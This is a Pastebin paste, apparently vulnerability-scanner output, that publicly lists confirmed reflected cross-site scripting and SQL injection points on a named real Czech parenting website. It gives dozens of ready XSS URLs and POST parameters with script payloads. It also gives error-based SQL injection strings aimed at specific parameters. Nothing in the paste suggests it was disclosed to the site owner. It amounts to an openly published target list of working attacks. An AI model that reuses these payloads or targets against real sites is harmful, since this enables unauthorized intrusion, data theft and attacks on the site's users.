API tools faq
paste
Advertisement
sroub3k

mojedite.cz

sroub3k
Dec 24th, 2011
277
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.07 KB | None | 0 0
raw download clone embed print report
  1. XSS - http://mojedite.cz/
  2.  
  3.  
  4. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  5.  
  6. http://www.mojedite.cz/fulltext.php?'"--></style></script><script>alert(0x000084)</script>
  7. http://www.mojedite.cz/zabava.php?nsextt='"--></style></script><script>alert(0x000088)</script>
  8. http://www.mojedite.cz/klub_diary_list.php?nsextt='"--></style></script><script>alert(0x00008A)</script>
  9. http://www.mojedite.cz/rozcestnik.php?id=4&nsextt='"--></style></script><script>alert(0x000160)</script>
  10. http://www.mojedite.cz/ptejtese_odbornik.php?nsextt='"--></style></script><script>alert(0x000162)</script>
  11. http://www.mojedite.cz/index.php?nsextt='"--></style></script><script>alert(0x00015D)</script>
  12. http://www.mojedite.cz/kontakty.php?nsextt='"--></style></script><script>alert(0x00008D)</script>
  13. http://www.mojedite.cz/names.php?only=holky&searched=1&nsextt='"--></style></script><script>alert(0x00015E)</script>
  14. http://www.mojedite.cz/ptejtese_odbornik.php?'"--></style></script><script>alert(0x000185)</script>
  15. http://www.mojedite.cz/names.php?only="><script>alert(9)</script>&searched=1
  16. http://www.mojedite.cz/article_cat.php?stage=1&section=1&nsextt="></style><script>alert(9)</script>
  17. http://www.mojedite.cz/bazar_detail.php?id=25995&sectionid=3&type=sell&nsextt="><body onload=alert(9)>
  18. http://www.mojedite.cz/recipe_detail.php?id=7&stage=0&nsextt="><body onload=alert(9)>
  19. http://www.mojedite.cz/article_cat.php?'"--></style></script><script>alert(0x0002C2)</script>
  20. http://www.mojedite.cz/zabava.php?'"--></style></script><script>alert(0x0002CA)</script>
  21. http://www.mojedite.cz/bazar_detail.php?'"--></style></script><script>alert(0x0002CC)</script>
  22. http://www.mojedite.cz/kontakty.php?'"--></style></script><script>alert(0x0002DE)</script>
  23. http://www.mojedite.cz/index.php?"><object/onerror=alert(9)>
  24. http://www.mojedite.cz/fulltext.php?vyhledavani="><body onload=alert(9)>
  25. http://www.mojedite.cz/bazar_detail.php?id=25995&sectionid=3&type='"--></style></script><script>alert(0x000323)</script>
  26. http://www.mojedite.cz/recipe_cat.php?section=1&nsextt='"--></style></script><script>alert(0x000341)</script>
  27. http://www.mojedite.cz/guide_detail.php?section=2&stage=2&nsextt='"--></style></script><script>alert(0x000349)</script>
  28. http://www.mojedite.cz/bazar_cat.php?nsextt='"--></style></script><script>alert(0x0003F5)</script>
  29. http://www.mojedite.cz/bazar_cat.php?sectionid=6&type='"--></style></script><script>alert(0x000421)</script>
  30. http://www.mojedite.cz/bazar.php?new='"--></style></script><script>alert(0x000432)</script>&type=sell
  31. http://www.mojedite.cz/poslat_odkaz.php?id=3531&iden='"--></style></script><script>alert(0x000C24)</script>
  32. http://www.mojedite.cz/fulltext.php?vyhledavani='"--></style></script><script>alert(0x000D5B)</script>
  33. http://www.mojedite.cz/fulltext.php?vyhledavani="><iframe onload=alert(9)>
  34. http://www.mojedite.cz/article_detail.php?typeId=733&type=" stYle=x:expre/**/ssion(alert(9)) ns=" &parentId=1923692&startPos=3&ref=3
  35. http://www.mojedite.cz/bazar.php?new=1&type='"--></style></script><script>alert(0x0005F7)</script>
  36. http://www.mojedite.cz/diskuse_cat.php?sectionid=1&nsextt='"--></style></script><script>alert(0x000568)</script>
  37. http://www.mojedite.cz/diskuse_cat.php?sectionid=1&nsextt="><script>alert(9)</script>
  38. http://www.mojedite.cz/guide.php?'"--></style></script><script>alert(0x0005FD)</script>
  39. http://www.mojedite.cz/kontakty.php?region="></script><script>alert(9)</script>&type=3&country=1
  40. http://www.mojedite.cz/klub_diary_list.php?topstartPos='"--></style></script><script>alert(0x0006DE)</script>&startPos=0
  41. http://www.mojedite.cz/diskuse_cat.php?'"--></style></script><script>alert(0x0006EE)</script>
  42.  
  43. Summary
  44. Severity : Important
  45. Confirmation : Confirmed
  46. Detection Accuracy :
  47. Vulnerable URL : http://www.mojedite.cz/bazar_cat.php
  48. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  49. Parameter Name: sectionid_s
  50. Parameter Type: Post
  51. Attack Pattern: '"--></style></script><script>alert(0x0004DE)</script>
  52.  
  53. Severity : Important
  54. Confirmation : Confirmed
  55. Detection Accuracy :
  56. Vulnerable URL : http://www.mojedite.cz/registrace.php
  57. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  58. Parameter Name: baby_nursed_month_1
  59. Parameter Type: Post
  60. Attack Pattern: '"--></style></script><script>alert(0x0004FC)</script>
  61.  
  62. Severity : Important
  63. Confirmation : Confirmed
  64. Detection Accuracy :
  65. Vulnerable URL : http://www.mojedite.cz/registrace.php
  66. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  67. Parameter Name: baby_nursed_month_1
  68. Parameter Type: Post
  69. Attack Pattern: "></script><script>alert(9)</script>
  70.  
  71. Severity : Important
  72. Confirmation : Confirmed
  73. Detection Accuracy :
  74. Vulnerable URL : http://www.mojedite.cz/bazar.php
  75. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  76. Parameter Name: type
  77. Parameter Type: Post
  78. Attack Pattern: '"--></style></script><script>alert(0x000567)</script>
  79.  
  80. Severity : Important
  81. Confirmation : Confirmed
  82. Detection Accuracy :
  83. Vulnerable URL : http://www.mojedite.cz/bazar.php
  84. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  85. Parameter Name: type
  86. Parameter Type: Post
  87. Attack Pattern: "><script>alert(9)</script>
  88.  
  89. Severity : Important
  90. Confirmation : Confirmed
  91. Detection Accuracy :
  92. Vulnerable URL : http://www.mojedite.cz/bazar_cat.php
  93. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  94. Parameter Name: type_s
  95. Parameter Type: Post
  96. Attack Pattern: '"--></style></script><script>alert(0x000704)</script>
  97.  
  98. Severity : Important
  99. Confirmation : Confirmed
  100. Detection Accuracy :
  101. Vulnerable URL : http://www.mojedite.cz/kontakty.php
  102. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  103. Parameter Name: email
  104. Parameter Type: Post
  105. Attack Pattern: '"--></style></script><script>alert(0x00086B)</script>
  106.  
  107. Severity : Important
  108. Confirmation : Confirmed
  109. Detection Accuracy :
  110. Vulnerable URL : http://www.mojedite.cz/kontakty.php
  111. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  112. Parameter Name: infoline
  113. Parameter Type: Post
  114. Attack Pattern: '"--></style></script><script>alert(0x000871)</script>
  115.  
  116. Severity : Important
  117. Confirmation : Confirmed
  118. Detection Accuracy :
  119. Vulnerable URL : http://www.mojedite.cz/kontakty.php
  120. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  121. Parameter Name: type
  122. Parameter Type: Post
  123. Attack Pattern: '"--></style></script><script>alert(0x000B8D)</script>
  124.  
  125. Severity : Important
  126. Confirmation : Confirmed
  127. Detection Accuracy :
  128. Vulnerable URL : http://www.mojedite.cz/kontakty.php
  129. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  130. Parameter Name: region
  131. Parameter Type: Post
  132. Attack Pattern: '"--></style></script><script>alert(0x000B94)</script>
  133.  
  134. Severity : Important
  135. Confirmation : Confirmed
  136. Detection Accuracy :
  137. Vulnerable URL : http://www.mojedite.cz/kontakty.php
  138. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  139. Parameter Name: region
  140. Parameter Type: Post
  141. Attack Pattern: "></style><script>alert(9)</script>
  142.  
  143. Severity : Important
  144. Confirmation : Confirmed
  145. Detection Accuracy :
  146. Vulnerable URL : http://www.mojedite.cz/kontakty.php
  147. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  148. Parameter Name: type
  149. Parameter Type: Post
  150. Attack Pattern: '"--></style></script><script>alert(0x000E36)</script>
  151.  
  152. Severity : Important
  153. Confirmation : Confirmed
  154. Detection Accuracy :
  155. Vulnerable URL : http://www.mojedite.cz/names.php
  156. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  157. Parameter Name: ord
  158. Parameter Type: Post
  159. Attack Pattern: '"--></style></script><script>alert(0x000E35)</script>
  160.  
  161. Severity : Important
  162. Confirmation : Confirmed
  163. Detection Accuracy :
  164. Vulnerable URL : http://www.mojedite.cz/names.php
  165. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  166. Parameter Name: ord
  167. Parameter Type: Post
  168. Attack Pattern: title'"--></style></script><script>alert(0x000E5B)</script>
  169.  
  170. Severity : Important
  171. Confirmation : Confirmed
  172. Detection Accuracy :
  173. Vulnerable URL : http://www.mojedite.cz/ptejtese_odbornik.php
  174. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  175. Parameter Name: jmeno
  176. Parameter Type: Post
  177. Attack Pattern: "><script>alert(9)</script>
  178.  
  179. Severity : Important
  180. Confirmation : Confirmed
  181. Detection Accuracy :
  182. Vulnerable URL : http://www.mojedite.cz/names.php
  183. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  184. Parameter Name: to_day
  185. Parameter Type: Post
  186. Attack Pattern: '"--></style></script><script>alert(0x000EB5)</script>
  187.  
  188. |||
  189.  
  190. [High Possibility] SQL Injection
  191.  
  192. Severity : Critical
  193. Confirmation : Confirmed
  194. Detection Accuracy :
  195. Vulnerable URL : http://www.mojedite.cz/bazar_detail.php?id=25995&sectionid=%27&type=sell
  196. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  197. Parameter Name: sectionid
  198. Parameter Type: Querystring
  199. Attack Pattern: %27
  200.  
  201. Severity : Critical
  202. Confirmation : Confirmed
  203. Detection Accuracy :
  204. Vulnerable URL : http://www.mojedite.cz/bazar_cat.php?sectionid=%27&type=sell
  205. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  206. Parameter Name: sectionid
  207. Parameter Type: Querystring
  208. Attack Pattern: %27
  209.  
  210. Severity : Critical
  211. Confirmation : Confirmed
  212. Detection Accuracy :
  213. Vulnerable URL : http://www.mojedite.cz/bazar_cat.php
  214. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  215. Parameter Name: sectionid_s
  216. Parameter Type: Post
  217. Attack Pattern: %27
  218.  
  219. Severity : Critical
  220. Confirmation : Confirmed
  221. Detection Accuracy :
  222. Vulnerable URL : http://www.mojedite.cz/bazar_cat.php
  223. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  224. Parameter Name: sectionid_s
  225. Parameter Type: Post
  226. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  227.  
  228. Severity : Critical
  229. Confirmation : Confirmed
  230. Detection Accuracy :
  231. Vulnerable URL : http://www.mojedite.cz/klub_diary_list.php?startPos=10&topstartPos=%27&vyhledat_jmeno=3&vyhledat_cislo=3
  232. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  233. Parameter Name: topstartPos
  234. Parameter Type: Querystring
  235. Attack Pattern: %27
  236.  
  237. Severity : Critical
  238. Confirmation : Confirmed
  239. Detection Accuracy :
  240. Vulnerable URL : http://www.mojedite.cz/klub_diary_list.php?topstartPos=%27&startPos=0
  241. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  242. Parameter Name: topstartPos
  243. Parameter Type: Querystring
  244. Attack Pattern: %27
  245.  
  246. Severity : Critical
  247. Confirmation : Confirmed
  248. Detection Accuracy :
  249. Vulnerable URL : http://www.mojedite.cz/diskuse_detail.php?typeId=%27&type=MAIN&parentId=1951387&startPos=3&ref=3
  250. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  251. Parameter Name: typeId
  252. Parameter Type: Querystring
  253. Attack Pattern: %27
  254.  
  255. Severity : Critical
  256. Confirmation : Confirmed
  257. Detection Accuracy :
  258. Vulnerable URL : http://www.mojedite.cz/bazar_detail.php?id=25993&sectionid=' and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or '1'='&type=sell
  259. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  260. Parameter Name: sectionid
  261. Parameter Type: Querystring
  262. Attack Pattern: ' and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or '1'='
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!